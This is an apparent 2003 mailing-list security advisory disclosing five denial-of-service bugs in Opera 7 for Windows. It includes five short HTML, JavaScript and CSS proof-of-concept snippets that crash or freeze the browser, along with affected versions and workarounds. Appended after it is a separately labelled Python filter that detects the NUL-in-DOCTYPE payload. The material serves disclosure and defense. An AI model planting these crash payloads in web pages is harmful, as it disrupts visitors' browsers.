[Opera 7] Five DoS codes on general web sites

From: :: Operash :: (nesuminat_private)
Date: Mon Jun 30 2003 - 08:45:28 PDT

    ---------------------------------------------------------------------------------
    TITLE          :[Opera 7] Five DoS codes on general web sites
                    -= Fastest browser on earth, Fastest crash on earth too =-
    PRODUCT        : Opera for Windows
    VERSIONS       : 7.11b build 2887
                     7.11  build 2880
                     7.10  build 2840
                     7.03  build 2670
    VENDOR         : Opera Software ASA (http://www.opera.com/)
    SEVERITY       : Medium.
                     Abnormal Termination, Freeze, and DoS attacks.
    DISCOVERED BY  : imagine, nesumin
    AUTHOR         : :: Operash ::
    REPORTED DATE  : 2003-06-24
    PUBLISHED DATE : 2003-07-01
    ----------------------------------------------------------------------------------
    
    0. PRODUCT INFORMATION
    ========================
    
      Opera for Windows is a GUI-based web browser.
      Opera Software ASA (http://www.opera.com/)
    
    
    1. DESCRIPTION
    ================
    
      There are many unfixed bugs in Opera 7 that cause abnormal
      termination or a freeze.
      By exploiting these bugs, attackers can carry out DoS attacks.
    
      The following are 5 sample codes, as they could appear on general web sites.
    
    
    2. SAMPLE CODE & IMPACT
    =========================
    
      [ CODE 1 ]
    
        Just 12 bytes of data, "<!DOCTYPE" + NULL (\x00) + 1 byte + ">", make
        CPU usage go up to 100% (depending on computer specs), and the
        computer freezes.
    
        -----------------------------------------------------------------
          <!DOCTYPE[\x00]A>
        -----------------------------------------------------------------
    
    
      [ CODE 2 ]
    
        Abnormal termination is caused.
    
        -----------------------------------------------------------------
          <form></form><script>document.forms[0].submit()</script>
        -----------------------------------------------------------------
    
    
      [ CODE 3 ]
    
        Abnormal termination is caused.
    
        -----------------------------------------------------------------
          <table>
          <tr id="crash" style="display:inline"><td>
          <script>crash.style.display = "none";</script>
          </td></tr>
          </table>
        -----------------------------------------------------------------
    
    
      [ CODE 4 ]
    
        Abnormal termination is caused.
    
        -----------------------------------------------------------------
          <table>
          <map id="crash" style="position:absolute"></map>
          <script>crash.style.height = crash.style.width = '0';</script>
          </table>
        -----------------------------------------------------------------
    
    
      [ CODE 5 ]
    
        CPU usage goes up to 100% (depending on computer specs), and the
        computer freezes.
    
        -----------------------------------------------------------------
          <html>
          <head>
            <style type="text/css">
            <!--
            .aaaaa:after{content:"A";display:block}
            .bbbbb{display:run-in}
            .ccccc{display:inline-block}
            //-->
            </style>
          </head>
          <body>
          <div class="aaaaa">
           <div class="bbbbb">
            <div class="ccccc">
            </div>
           </div>
          </div>
          </body>
          </html>
        -----------------------------------------------------------------
    
    
    3. SYSTEMS AFFECTED
    =====================
    
      Opera (For Windows)
        7.11b build 2887
        7.11  build 2880
        7.10  build 2840
        7.03  build 2670 (except [ CODE 5 ])
        Versions lower than 7.03 might be affected too (not tested).
    
    
    4. TESTED ENVIRONMENTS
    ========================
    
      Opera (For Windows, English/Japanese) :
        7.11b build 2887
        7.11  build 2880
        7.10  build 2840
        7.03  build 2670
    
      Platform :
        Windows 98SE Japanese Edition
        Windows 2000 Pro SP3 Japanese Edition
    
    
    5. WORKAROUND
    ===============
    
      [ CODE 1 ]  -----
      [ CODE 2 ]  Disable "JavaScript"
      [ CODE 3 ]  Disable "JavaScript"
      [ CODE 4 ]  Disable "JavaScript"
      [ CODE 5 ]  Disable "CSS Author mode"
    
    
    6. TIME TABLE & VENDOR STATUS
    ===============================
    
      2003-06-24 Reported to vendor.
      2003-07-01 Released this advisory.
    
      No reply from vendor.
    
    
    7. DISCLAIMER
    ===============
    
      A. We cannot guarantee the accuracy of all statements in this information.
      B. We do not anticipate issuing updated versions of this information
         unless there is some material change in the facts.
      C. We take no responsibility for any kind of disadvantage caused by
         using this information.
      D. You can quote this advisory without our permission if you observe the following:
         a. Do not distort this advisory's content.
         b. A quoted place should be a medium on the Internet.
      E. If you have any questions, please contact us.
    
    
      * Exception
    
         We strictly forbid 'Secunia' to republish or redistribute our advisory.
    
              ...Well, even though, we know this request would be ignored.
    
              The CTO of Secunia has told us;
                "If you do not want us to write about your vulnerabilities -
                 then stop posting them!"
    
              Well.. We can do nothing for this sort of arrogance :/
    
    
    8. CONTACT, ETC
    =================
    
      :: Operash ::
    
      imagine (Operash Webmaster)
      nesumin <nesuminat_private>
    
    
      Thanks to :
    
        melorin
        piso(sexy)
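
The workaround table lists nothing for [ CODE 1 ]. As an added example (not part of the original advisory), a content filter in front of the browser could flag response bodies whose DOCTYPE declaration contains a NUL byte, the structure [ CODE 1 ] describes. The function name, the length bound and the sample bodies are assumptions constructed for this illustration.

```python
import re

# Start of a DOCTYPE declaration, matched case-insensitively on raw bytes.
DOCTYPE_START = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
MAX_DECL_LEN = 1024  # assumed upper bound on a legitimate declaration


def find_nul_doctypes(body: bytes):
    """Return (offset, declaration) for every DOCTYPE that contains NUL."""
    hits = []
    for m in DOCTYPE_START.finditer(body):
        start = m.start()
        end = body.find(b">", m.end(), start + MAX_DECL_LEN)
        # Unterminated declaration: inspect up to the length bound instead.
        stop = end + 1 if end != -1 else min(len(body), start + MAX_DECL_LEN)
        decl = body[start:stop]
        if b"\x00" in decl:
            hits.append((start, decl))
    return hits


# Constructed sample bodies (not captured traffic).
SAMPLES = {
    "advisory_code1": b"<!DOCTYPE\x00A>",
    "benign": b'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"><html></html>',
    "nul_in_body_only": b"<!DOCTYPE html><p>a\x00b</p>",
    "lowercase": b"<html><!doctype\x00x></html>",
    "unterminated": b"<!DOCTYPE\x00A",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        hits = find_nul_doctypes(body)
        verdict = "FLAG" if hits else "pass"
        print(f"{name:18} {verdict} {hits!r}")
```

A NUL byte elsewhere in the body is deliberately not flagged; only the declaration itself is inspected.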
    


